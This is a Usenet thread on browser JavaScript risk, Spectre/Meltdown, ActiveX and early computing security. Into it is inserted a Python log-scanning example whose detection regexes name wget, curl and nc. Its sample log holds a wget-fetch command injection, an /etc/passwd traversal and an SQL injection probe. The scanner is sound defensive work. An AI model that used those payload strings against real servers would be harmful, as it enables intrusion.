Spectre / Meltdown

Does nothing for you if the code running in the browser is able to exploit CPU flaws to achieve privilege escalation.

--
Steve O'Hara-Smith                          |   Directable Mirror Arrays 
C:\>WIN                                     | A better way to focus the sun 
The computer obeys and wins.                |    licences available see 
You lose and Bill collects.                 |    http://www.sohara.org/
Reply to
Ahem A Rivet's Shot

Rubbish

--
"I know that most men, including those at ease with problems of the greatest complexity, can seldom accept even the simplest and most obvious truth if it be such as would oblige them to admit the falsity of conclusions which they have delighted in explaining to colleagues, which they have proudly taught to others, and which they have woven, thread by thread, into the fabric of their lives."

- Leo Tolstoy

Reply to
The Natural Philosopher

Problem is look-ahead caching

Modern processors use it to gain speed, but it blows away process compartmentalisation.

Reply to
The Natural Philosopher

"Robert Riches" wrote

| > When you combine the corporate security model with
| > SOHo usage you get crazy risk.
|
| There is a solution that significantly decreases risk when
| allowing JavaScript in a web browser:
|
| Run the browser from a different (browser-only) user account
| that has very strictly controlled access to files owned by
| your normal account.

That seems like an awful lot of work to me. I don't even use a restricted user account in the first place. Since most people do, any malware attack has to be able to bypass the restrictions, and the only result is that I can't access my own files!

But I guess that's at least some help if people bank online. I avoid doing things like that. For a while I've taken an approach of having 2 Gecko browsers on all computers. One is Firefox with NoScript, which I use if I must enable script. The other is New Moon, Pale Moon, or Waterfox, with the prefs set for optimal privacy and security -- blocking script, iframes, 3rd-party files, prefetch, autorefresh, and so on. I rarely need to use the browser with script. And I've never liked things moving on webpages, anyway. So I don't mind the simpler layout. Though I have to admit that pages are becoming increasingly broken. I often end up toggling CSS off in order to get links to work or to see text that webmasters have hidden from anyone disabling script.

Push has never really taken off, but increasingly javascript is being used to make pages work like an interactive broadcast. Either you let them spy on you, and let them change the webpage as you're viewing it, or they'll do their best to make sure you can't view it at all. So much for the information superhighway. What we've ended up with is sleazeballs, large and small, each fashioning their own custom turnpike to extort from passersby.

Reply to
Mayayana

"Deloptes" wrote

| Mayayana wrote:
|
| > When you combine the corporate security model with
| > SOHo usage you get crazy risk.
|
| @Mayayana, I am becoming a fan of you.

Thank you. I don't actually find many people agree with that. Even most programmers, having been trained in a corporate environment, subscribe to the idea that all will be well as long as everyone is restricted to being a lackey user with no rights to do anything but write their own MS Word files.

Reply to
Mayayana

"The Natural Philosopher" wrote

| On 28/08/2020 12:54, Mayayana wrote:
| > Simple rule: If you allow javascript or other executable
| > code online, you're a sitting duck. If you also store private
| > data on your computer, use credit cards online, bank
| > online, etc, you're a sitting duck with something to lose.
|
| Rubbish

Interesting reasoning. I think I have to agree with Leo T on this one. :)

| --
| "I know that most men, including those at ease with problems of the
| greatest complexity, can seldom accept even the simplest and most
| obvious truth if it be such as would oblige them to admit the falsity of
| conclusions which they have delighted in explaining to colleagues, which
| they have proudly taught to others, and which they have woven, thread by
| thread, into the fabric of their lives."
|
| - Leo Tolstoy

Reply to
Mayayana

ed:

lementation_issues

Even the ARM2 was pipelined; you'll probably have to go back to the 8-bit era, such as the 6502, to find one which wasn't.

Pipelining isn't the problem though, it's the vastly more complex aspects of modern processors such as branch prediction, speculative execution and caching which are targeted by these exploits.

No protected information is directly leaked by the bugs, but manipulations of these features can allow protected information to be deduced from timing differences of cached or uncached memory accesses.

---druck

Reply to
druck

Indeed. He is most apposite. The difference between theoretical risk and practical risk is huge - as anyone who has tried to actually hack anything or run a public-facing server will tell you. In the real world the quality of attacks is abysmally low. But try to convince an armchair expert of that...

--
"What do you think about Gay Marriage?" 
"I don't." 
"Don't what?" 
"Think about Gay Marriage."
Reply to
The Natural Philosopher

Fair comment - the 6809, which is the 8/16-bit chip I know best from writing a fair amount of assembler on one back in the day, isn't pipelined either.

I also have a lot of time on a 68020, running OS-9/68000 but only writing C and a 4GL on it, so I am relatively unfamiliar with its execution modes.

The 68020 has a 3-stage pipeline and a 256-byte instruction cache, but no protected address space or protection rings. I'd guess from this that it is impervious to Spectre or similar attacks - not that you'd ever need them, because all RAM is accessible to any process. BTW, under OS-9 all processes are written in position-independent code, so processes can be loaded anywhere in RAM and the OS can move any user process in RAM, provided it's not running - something that is guaranteed while the OS is rearranging processes in memory.

--
Martin    | martin at 
Gregorie  | gregorie dot org
Reply to
Martin Gregorie

I don't know how old you are, but my observation is that things got worse in the past 10-15 years, especially after smartphones came out. But it also could be that before, things were not that obvious.

Reply to
Deloptes

I started programming in 1978 and have a slightly different take on it. I was in the industry 2-3 years before COBOL appeared. Before that almost all commercial software was written in assembler and the lifetime of a lot of systems was 3-4 years. No online access - the programmer's friend was a 12-key card punch and the main problem was that there was no documentation maintained and bugger-all comments in programs, so a lot of code was unmaintainable.

I ran into online programming (on a teletype) in 1970 and by 1973 'glass teletypes' had appeared. From 1973-1975 or so terminals started to appear on mainframes but most commercial programming was in COBOL and a lot was still done with card input and source held on mag tapes or disks. We had local greenscreen terminals and no connectivity outside the office. This was on a job in 1976/77 on an ICL 2903 but I don't recall any more than cursory attention to security: it just wasn't an issue in those days. Throughout this era there was little attention given to security or to maintaining system documentation - one company (Smiths Industries) had a fixed policy that all documentation was destroyed as soon as a system or fix went live, despite this being the period when system lifetimes started to extend quite drastically.

After a year off, I started work at the BBC in 1978 (ICL 2966 / COBOL IDMSX database) and in about 1980 I did my first real online system, an online music planning system for Radio 3. Again, no external connectivity and 24 x 80 greenscreens, but we did use online logins and the login name controlled what a logged-in user could do: music producers could enquire, the music planning staff could update programs, their supervisors could update the music and performer catalogues used to plan, record, perform and reuse musical programs and concerts, and the sysadmin could do everything. We wrote better documentation than for any earlier system I worked on, but it still wasn't great.

It's fair to say that I never saw either good documentation or serious concern about system security until I joined Logica in 1984: there both were de rigueur.

Reply to
Martin Gregorie

"Deloptes" wrote

| I don't know how old you are, but my observation is that things got worse
| in the past 10-15 years, especially after smartphones came out.
| But it also could be that before, things were not that obvious.

I'm a babyboomer, but only discovered computers with Win98. Then I got hooked and taught myself Windows programming. So I don't have the long view that you old men have. :)

I guess what I saw was great fun with the PC fad of the late 90s. Then some malware written by geeks or teenagers for fun. Exploitation of ActiveX in IE. Melissa. Remember that one? Some office worker decided to play a practical joke with script in a Word DOC and it became a disaster. That kind of thing. I thought MS were brilliant with ActiveX. They just didn't see the security problems coming.

Security then became an excuse to start locking down and turning computers into service devices. I guess that would be about the last 10-15 years. From there it became big business, with sophisticated hackers. But neither governments nor businesses want people to have privacy or control their devices. So how do we establish security protocols?

I'm kind of surprised that no one's written a sci-fi horror story where hackers erase all of the data around the world, after it's all gone digital, and ownership of all kinds is erased. What a mess that would be. History erased. Records erased. Communication. Deeds. Bank accounts. All gone in a flash. Yet people continue to digitize data that doesn't need to be digitized and add computers to machines that don't need them.

Even one super solar flare, which supposedly happens every few hundred years could possibly fry all integrated circuits. 30 years ago that would have been a minor issue. Today it would stop cars, computers, utilities... everything. Yet people keep spending hundreds of dollars for watches to tell them their heart is beating. So I try to avoid unnecessary computerization.

Reply to
Mayayana

"Martin Gregorie" wrote

| I started programming in 1978 and have a slightly different take on it.
| [...]
| It's fair to say that I never saw either good documentation or serious
| concern about system security until I joined Logica in 1984: there both
| were de rigueur.

That's all before my time. I remember having a housemate in '82 who bought a Commodore 64. $300 to play hangman on a B/W TV screen about 5 inches across. I thought he was out of his mind. :)

But in my limited experience it doesn't seem like we've really needed security until recently, except maybe at the CIA. Only recently have people banked online, used electronic credit card readers, and so on. In 2000, what could people steal from your computer or gain from hacking into your online connection? Not very much. Maybe they could steal your AOL password.
Reply to
Mayayana

Not quite your plot, but there is some decidedly prescient SF on the subject:

Start with William Gibson's 'Neuromancer" (1984).

If you like that one, try his 'Count Zero' and 'Burning Chrome'

Neal Stephenson's "Snow Crash" is also rather good, as is "Cryptonomicon".

Reply to
Martin Gregorie

Depends what you're doing. The CHAPS financial network went live in 1984 as the first network where the message WAS the money and has always run on a private network transferring messages that are encrypted in special tamper-proof modules. SWIFT was earlier, first message passed in 1977, but SWIFT messages are merely *about* money: unlike CHAPS, they are not money transfers.

Another marker: the first time I saw a personal computer was in 1976 at "The Computer Store" in NYC at 5th and 35th. That's before Apple but not by much - the hot machines were made by SWTPC and IMSAI. We had an Apple II at the BBC in 1978 - I used it to demonstrate how a centralised journalist's contact database might look and work.

I'd put the start of hackery a bit earlier: soon after 1990, when the first web browser was released. That, and Win 95 really marked the start of 'just folks' rather than just IT professionals and computer enthusiasts starting to use data networks. A student wrote (and lost control of) the first Internet worm around that time.

Win 95 had ZERO security and, sadly, Windoze, is still rather behind the times in that sphere.

Reply to
Martin Gregorie

Whereas some of us saw ActiveX for the first time and shook our heads in sorrow because it looked like the most stupid idea we'd seen since email clients that allowed attachments to execute.

Reply to
Ahem A Rivet's Shot

Many years ago now I read a paper on the subject of viruses, worms et al that made the point that a well written penetration should go unnoticed as it silently hijacks some proportion of your resources. The paper went on to describe in detail the principles behind what is now known as a botnet, a large set of compromised machines and a private encrypted virtual network via which they may be controlled. There are a lot of them around these days and renting use of them is commonplace.

Anyone who runs a public facing server will certainly tell you that they have logs full of long obsolete script-kiddy attacks on misconfigured servers and injection attack probes and so on. However if they are ever successfully compromised by a professional the chances are they'll never know anything about it.

Reply to
Ahem A Rivet's Shot
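The "logs full of long obsolete script-kiddy attacks ... and injection attack probes" that Steve mentions above are easy to surface mechanically. The following is an added example, not code from any poster in this thread: it scans web server access-log lines in the common combined format (assumed; Apache and nginx both default to it) for a handful of probe patterns (path traversal, SQL injection, command injection, and requests for legacy scanner targets such as /phpmyadmin or /cgi-bin/) and tallies them per source IP. The log lines are constructed for the example, the signature list is a minimal illustration rather than a complete ruleset, and the two-pass URL decoding is there so double-encoded traversal (%252e%252e) is caught as well as the plain form.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format (Apache/nginx default); an assumption for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Probe signatures, matched against the URL-decoded request path.
# Illustrative subset only; a real ruleset is far larger.
SIGNATURES = {
    "path_traversal": re.compile(r"(\.\./|\.\.\\)"),
    "sql_injection": re.compile(
        r"('|\")\s*(or|and)\s+\d+\s*=\s*\d+|union\s+select|sleep\(\d+\)", re.I),
    "cmd_injection": re.compile(
        r"(;|\||`|\$\()\s*(cat|wget|curl|sh|bash|nc)\b", re.I),
    "legacy_scanner": re.compile(
        r"^/(phpmyadmin|pma|cgi-bin/|wp-login\.php|\.env|xmlrpc\.php)", re.I),
}

# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Aug/2020:12:54:01 +0100] "GET /index.html HTTP/1.1" 200 5120
203.0.113.7 - - [28/Aug/2020:12:54:02 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 196
198.51.100.23 - - [28/Aug/2020:12:55:10 +0100] "GET /cgi-bin/test.cgi?x=../../../../etc/passwd HTTP/1.0" 404 196
198.51.100.23 - - [28/Aug/2020:12:55:11 +0100] "GET /products.php?id=1%27%20OR%201%3D1-- HTTP/1.1" 200 8123
192.0.2.55 - - [28/Aug/2020:12:56:00 +0100] "GET /about HTTP/1.1" 200 2210
198.51.100.23 - - [28/Aug/2020:12:57:42 +0100] "GET /shell.php?cmd=;wget+http://198.51.100.23/x.sh HTTP/1.1" 404 196
garbage line that does not parse
""".splitlines()


def decode_path(path):
    # Decode twice so a double-encoded %252e%252e also surfaces as "..".
    return unquote(unquote(path))


def classify(path):
    """Return the list of signature names that match the decoded path."""
    decoded = decode_path(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan(lines):
    """Return (hits, per_ip, unparsed).

    hits:     list of (ip, raw_path, [signature names]) for flagged requests
    per_ip:   Counter of flagged requests per source IP
    unparsed: lines that did not match the log format (never silently dropped)
    """
    hits, per_ip, unparsed = [], Counter(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            unparsed.append(line)
            continue
        tags = classify(m["path"])
        if tags:
            hits.append((m["ip"], m["path"], tags))
            per_ip[m["ip"]] += 1
    return hits, per_ip, unparsed


if __name__ == "__main__":
    hits, per_ip, unparsed = scan(SAMPLE_LOG)
    for ip, path, tags in hits:
        print(f"{ip:15} {','.join(tags):30} {path}")
    print("\nflagged requests per source IP:")
    for ip, n in per_ip.most_common():
        print(f"  {ip:15} {n}")
    print(f"\n{len(unparsed)} unparsed line(s)")
```

Run it on a real access log with `scan(open("access.log").readlines())`. Two things from the post are worth keeping in mind when reading the output: these noisy hits are exactly the low-quality traffic Steve describes, and the per-IP tally is only useful for the attackers who make noise; a careful intruder's requests will not trip any of these patterns, which is the point of his second paragraph.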

"Ahem A Rivet's Shot" wrote

| > That kind of thing. I though MS were brilliant with | > ActiveX. They just didn't see the security problems | > coming. | | Whereas some of us saw ActiveX for the first time and shook our | heads in sorrow because it looked like the most stupid idea we'd seen since | email clients that allowed attachments to execute. |

You really thought that back then? It's what allowed them to beat Netscape. For years it was a brilliant design. It still is. It's just not safe. I write a lot of HTAs, using script and COM for the functionality and IE for the GUI.

Reply to
Mayayana

It doesn't blow it away; it makes a very very difficult and very very ineffective attack theoretically possible.

I'm pretty certain none of these timing related speculative execution vulnerabilities have ever been found being used "in the wild" by malicious hackers.

--
Brian Gregory (in England).
Reply to
Brian Gregory

They just made IE part of the OS and this was the reason for the trials.

Reply to
Deloptes
